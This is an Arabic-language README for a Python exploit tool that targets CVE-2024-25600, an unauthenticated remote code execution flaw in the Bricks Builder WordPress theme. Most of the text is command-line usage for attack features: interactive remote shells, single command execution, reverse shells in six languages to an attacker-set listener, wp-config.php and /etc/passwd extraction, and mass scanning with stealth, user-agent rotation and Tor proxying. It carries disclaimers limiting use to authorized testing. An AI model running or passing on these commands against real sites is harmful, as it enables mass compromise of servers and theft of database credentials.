[!IMPORTANT]
للاستخدام المصرح به فقط. هذه الأداة مخصصة للبحث الأمني والتعليم واختبار الأنظمة التي تملكها أو لديك إذن كتابي صريح لتقييمها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.
جدول المحتويات
نظرة عامة
CVE-2024-25600 هي ثغرة حرجة لتنفيذ أوامر عن بعد غير مصادق عليها في قالب ووردبريس Bricks Builder. يؤدي التعامل غير السليم مع المدخلات التي يتحكم بها المستخدم في نقطة نهاية REST الخاصة بـ render_element إلى السماح للمهاجمين غير المصادق عليهم بتنفيذ أوامر PHP/نظام عشوائية على التركيبات المتأثرة.
BricksRCE Exploiter (cve-2024-25600.py) هي أداة تقييم بايثون كاملة الميزات لمتخصصي الأمن المصرح لهم من أجل:
- اكتشاف تركيبات Bricks Builder المعرضة للخطر
- التحقق من التأثير من خلال تنفيذ أوامر خاضعة للتحكم
- التفاعل مع المضيفين المخترقين عبر صدفة تفاعلية
- المسح الجماعي لقوائم الأهداف باستخدام عمال غير متزامنين/مترابطين
- تصدير النتائج المنظمة للتقارير
تفاصيل الثغرة
نقاط النهاية المتأثرة
| نقطة النهاية | الطريقة |
|---|
/wp-json/bricks/v1/render_element | POST |
/?rest_route=/bricks/v1/render_element | POST |
ملخص الهجوم
- استخراج nonce من Bricks من شفرة مصدر الصفحة المستهدفة
- إرسال طلب
render_element مصمم بحمولة عنصر ضارة
- يؤدي تقييم الكود من جانب الخادم إلى تنفيذ أوامر عشوائية
المراجع
الميزات
القدرات الأساسية
عناصر التحكم التشغيلية
إعداد التقارير
| القدرة | الوصف |
|---|
| تصدير JSON / TXT | حفظ نتائج المسح والأهداف المعرضة للخطر |
| سجل الأوامر | تسجيل اختياري للأوامر المنفذة |
| تسجيل الملفات | سجل مستمر bricks_rce.log بالإضافة إلى مسارات سجل مخصصة |
التثبيت
المتطلبات الأساسية
- Python 3.8+
pip
- إمكانية الوصول الشبكي إلى الأهداف المصرح بها
الإعداد
git clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python3 cve-2024-25600.py --help
التبعيات
requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0 # اختياري — دعم وكيل SOCKS5
بداية سريعة
استبدل https://target.example بهدف مختبر أو مصرح به فقط.
# صدفة تفاعلية
python3 cve-2024-25600.py -u https://target.example
# أمر واحد
python3 cve-2024-25600.py -u https://target.example --cmd "id"
# مسح جماعي
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json
# كشف الإصدار
python3 cve-2024-25600.py -u https://target.example --detect-version
# عبر وكيل Burp
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v
دليل الاستخدام
جميع الأمثلة تستخدم السكربت الرئيسي: cve-2024-25600.py
1. إظهار المساعدة
python3 cve-2024-25600.py --help
2. صدفة تفاعلية لهدف واحد
تفتح صدفة RCE تفاعلية بعد تأكيد أن الهدف معرض للخطر.
python3 cve-2024-25600.py -u https://target.example
سير العمل:
- توحيد شكل URL والتحقق من صحته
- استخراج nonce من الصفحة
- التحقق من الثغرة (إلا إذا تم استخدام
--force)
- الدخول إلى صدفة تفاعلية
3. تنفيذ أمر واحد
python3 cve-2024-25600.py -u https://target.example --cmd "whoami"
حفظ مخرجات الأمر في ملف:
python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output
4. اختيار نوع الحمولة
# الحمولة الافتراضية القائمة على استثناء PHP
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php
# الحمولة القائمة على system()
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system
5. كشف إصدار Bricks Builder
python3 cve-2024-25600.py -u https://target.example --detect-version
دمجه مع أمر:
python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"
6. استخراج wp-config.php
python3 cve-2024-25600.py -u https://target.example --extract-wp-config
يتم حفظه كـ wp-config_<target>.txt في حالة النجاح.
7. الصداف العكسية (مختبر مصرح به فقط)
# الطرفية 1 — المستمع
nc -lvnp 4444
# الطرفية 2 — صدفة عكسية bash
python3 cve-2024-25600.py -u https://target.example \
--reverse-shell bash \
--lhost 10.0.0.5 \
--lport 4444
جميع أنواع الصداف العكسية المدعومة:
python3 cve-2024-25600.py -u https://target.example --reverse-shell bash --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell nc --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell python --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell php --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell perl --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell ruby --lhost 10.0.0.5 --lport 4444
8. وضع القوة (تخطي فحص الثغرة)
python3 cve-2024-25600.py -u https://target.example --force --cmd "uname -a"
9. المسح الجماعي من ملف
# targets.txt — رابط واحد في كل سطر
python3 cve-2024-25600.py -f targets.txt
مع الخيوط، التأخير، التخفي، ومخرجات JSON:
python3 cve-2024-25600.py -f targets.txt \
-t 15 \
--delay 0.5 \
--stealth \
-o vulnerable.json
المسح المتزامن (تجمع خيوط) بدلاً من غير المتزامن:
python3 cve-2024-25600.py -f targets.txt --sync -t 10 -o results.txt
مسح جماعي صامت:
python3 cve-2024-25600.py -f targets.txt -q -o results.json
10. اختيار نقطة النهاية
# كلا نقطتي النهاية (الافتراضي)
python3 cve-2024-25600.py -u https://target.example --endpoint both
# فقط /wp-json/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint json
# فقط /?rest_route=/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint rest_route
11. وضع التخفي
python3 cve-2024-25600.py -u https://target.example \
--stealth \
--delay 1.0 \
--max-retries 5 \
--timeout 20
12. User-Agent مخصص
# UA مخصص
python3 cve-2024-25600.py -u https://target.example \
--user-agent "Mozilla/5.0 (compatible; SecurityScanner/1.0)"
# تعطيل تدوير UA العشوائي
python3 cve-2024-25600.py -u https://target.example --no-random-ua
13. دعم الوكيل
# وكيل HTTP (مثل Burp Suite)
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v
# وكيل SOCKS5
python3 cve-2024-25600.py -u https://target.example --proxy socks5://127.0.0.1:9050
# SOCKS5h (DNS عبر الوكيل / Tor)
python3 cve-2024-25600.py -u https://target.example --proxy socks5h://127.0.0.1:9050
14. التحقق من SSL
# تمكين التحقق من شهادة SSL (معطل افتراضياً)
python3 cve-2024-25600.py -u https://target.example --verify-ssl
15. المخرجات والتسجيل
# حفظ نتائج المسح كـ JSON
python3 cve-2024-25600.py -f targets.txt -o results.json
# حفظ نتائج المسح كـ TXT
python3 cve-2024-25600.py -f targets.txt -o results.txt
# ملف سجل تطبيق مخصص
python3 cve-2024-25600.py -u https://target.example --log-file assessment.log -v
# تسجيل الأوامر المنفذة
python3 cve-2024-25600.py -u https://target.example --command-log commands.log --cmd "id"
16. الأوضاع المفصلة والصامتة
# تسجيل مفصل / تصحيح
python3 cve-2024-25600.py -u https://target.example -v
# وضع صامت (مخرجات قليلة)
python3 cve-2024-25600.py -u https://target.example -q --cmd "id"
17. ضبط الأداء
python3 cve-2024-25600.py -f targets.txt \
-t 25 \
--timeout 20 \
--delay 0.2 \
--max-retries 5 \
-o results.json
18. مثال تقييم كامل مشترك
python3 cve-2024-25600.py -u https://target.example \
--detect-version \
--extract-wp-config \
--stealth \
--delay 0.8 \
--timeout 20 \
--max-retries 5 \
--endpoint both \
--proxy http://127.0.0.1:8080 \
--log-file bricks_assessment.log \
--command-log commands.log \
-v
19. أوامر الصدفة التفاعلية المضمنة
بعد البدء باستخدام -u (بدون --cmd / --reverse-shell):
Shell> whoami
Shell> id
Shell> pwd
Shell> ls -la
Shell> help
Shell> clear
Shell> download /etc/passwd
Shell> upload ./local.txt /tmp/remote.txt
Shell> php id
Shell> system uname -a
Shell> exit
مرجع الأوامر
خيارات الهدف
| الوسيط | الوصف |
|---|
-u, --url | URL هدف واحد |
-f, --file | ملف يحتوي على URLs الأهداف (واحد في كل سطر) |
خيارات المسح
خيارات التخفي
خيارات الاستغلال
خيارات المخرجات
الصدفة التفاعلية
عند استغلال هدف واحد بدون --cmd أو --reverse-shell، تفتح صدفة تفاعلية:
Shell> whoami
www-data
Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Shell> help
الأوامر المضمنة
الميزات
- سجل الأوامر محفوظ في
~/.bricks_rce_history
- الإكمال التلقائي للأوامر الشائعة
- اقتراحات تلقائية من السجل (prompt-toolkit)
المخرجات والتسجيل
وحدة التحكم
لوحات مدعومة بـ Rich، أشرطة تقدم، وجداول نتائج:
[*] Testing: https://target.example
[+] https://target.example is vulnerable!
[+] Interactive shell opened successfully
جدول نتائج المسح
تصدير JSON (-o results.json)
{
"timestamp": "2026-07-17T01:30:00",
"version": "1.0.0",
"config": {
"threads": 10,
"timeout": 15,
"delay": 0.5
},
"stats": {
"processed": 100,
"vulnerable": 3,
"failed": 97
},
"vulnerable_targets": [
{
"url": "https://target.example",
"timestamp": "2026-07-17T01:31:12"
}
]
}
ملفات السجل
| الملف | الغرض |
|---|
bricks_rce.log | سجل تطبيق إضافي افتراضي (إلحاق دائم) |
--log-file PATH | معالج سجل مخصص إضافي |
--command-log PATH | سجل تدقيق الأوامر المنفذة |
استكشاف الأخطاء
سير عمل التصحيح
# فحص هدف واحد مفصل
python3 cve-2024-25600.py -u https://target.example --detect-version -v
# عبر Burp لفحص الطلب
python3 cve-2024-25600.py -u https://target.example \
--proxy http://127.0.0.1:8080 -v --cmd "id"
# تفضيل نقطة نهاية محددة
python3 cve-2024-25600.py -u https://target.example --endpoint json -v
هيكل المستودع
exploit/
├── cve-2024-25600.py # BricksRCE Exploiter (v1.0)
├── requirements.txt # تبعيات بايثون
├── README.md # هذا الملف
├── bricks_rce.log # سجل وقت التشغيل (يتم إنشاؤه)
└── venv/ # بيئة افتراضية محلية (اختياري، غير مدرجة)
سجل الإصدارات
v1.0.0 — الإصدار الأولي
- اكتشاف واستغلال RCE غير مصادق عليه لـ CVE-2024-25600
- استخراج nonce متعدد الطرق
- صدفة تفاعلية مع رفع / تنزيل
- أوضاع الأمر الواحد والصدفة العكسية
- مسح جماعي غير متزامن / مترابط
- كشف الإصدار واستخراج wp-config
- وضع التخفي، تدوير UA، دعم الوكيل
- واجهة سطر أوامر غنية مع تصدير نتائج JSON/TXT
إخلاء المسؤولية
يتم توفير هذا المشروع كما هو لأغراض البحث الأمني الدفاعي واختبار الاختراق المصرح به.
باستخدام هذه البرمجية، فإنك توافق على ما يلي:
- ستستهدف فقط الأنظمة التي تملكها أو المصرح لك باختبارها صراحة.
- أنك تفهم قوانين إساءة استخدام الكمبيوتر وحماية البيانات المعمول بها.
- المؤلف والمساهمون ليسوا مسؤولين عن الضرر أو فقدان البيانات أو العواقب القانونية الناتجة عن سوء الاستخدام.
إذا اكتشفت هذه الثغرة في بيئات إنتاج لا تملكها، فاتبع ممارسات الإفصاح المسؤولة وتنسق مع مالك الموقع / فريق أمان Bricks Builder.
الوصول غير المصرح به إلى أنظمة الكمبيوتر هو جريمة فيدرالية.
المؤلف والإسناد
الترخيص
MIT License
Copyright (c) 2024–2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
الدعم
- ضع نجمة للمستودع إذا ساعدك في أبحاثك المصرح بها
- افتح مشكلة للأخطاء أو الإيجابيات الخاطئة أو تحسينات الكشف
- نرحب بطلبات السحب للوثائق وتجربة المستخدم في المختبرات المصرح بها
لاختبار الأمن المصرح به فقط.